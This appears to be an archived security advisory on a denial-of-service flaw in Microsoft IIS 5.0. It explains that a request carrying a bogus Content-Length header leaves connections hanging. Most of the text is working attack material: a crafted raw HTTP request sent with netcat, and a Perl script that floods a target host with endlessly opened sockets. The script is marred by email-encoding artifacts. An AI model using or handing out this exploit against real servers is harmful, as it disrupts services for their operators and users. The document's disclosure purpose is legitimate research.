|
COMMAND IIS DoS SYSTEMS AFFECTED IIS 5.0 PROBLEM Ivan Hernandez Puga posted : When you send a bad request to Microsoft IIS/5.0 server it gives you the error and closes the connection, like when you fail to authenticate. Well... let\'s take a look to a normal request: GET /testfile HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Host: 192.168.0.10 Connection: Keep-Alive Authorization: Basic And then let\'s add a \"Content-Length: 5300643\" field. When you send the new request to the server ir hangs there waiting something to happen and never closes the connection. Example exploit: $ cat \" GET /testfile HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Host: 192.168.0.10 Connection: Keep-Alive Content-Length: 5300643 Authorization: Basic\" >bogus.txt $ nc 192.168.0.10 80 Update ====== Exploit script by Ivan Hernandez : #!/usr/bin/perl # Written by Ivan Hernandez over code of Georgi Guninski=20 use IO::Socket; print \"IIS 5.0 Bogus Content-Length\\n\"; $port =3D @ARGV[1]; $host =3D @ARGV[0]; $req=3D\"GET /ampgn HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Host: 192.168.0.10 Connection: Keep-Alive Content-Length: 5300643 Authorization: Basic \" . \"A\" x 50000 . \"\\r\\n\\r\\n\"; $i=3D0; while (1) { $socket[$i] =3D IO::Socket::INET->new(PeerAddr =3D> $host,PeerPort =3D> $port,Proto =3D> \"TCP\"); syswrite($socket[$i],$req,length($req)); print \".\"; $i++; =09 } $i=3D0; print \"\\nDone.\"; SOLUTION Nothing yet.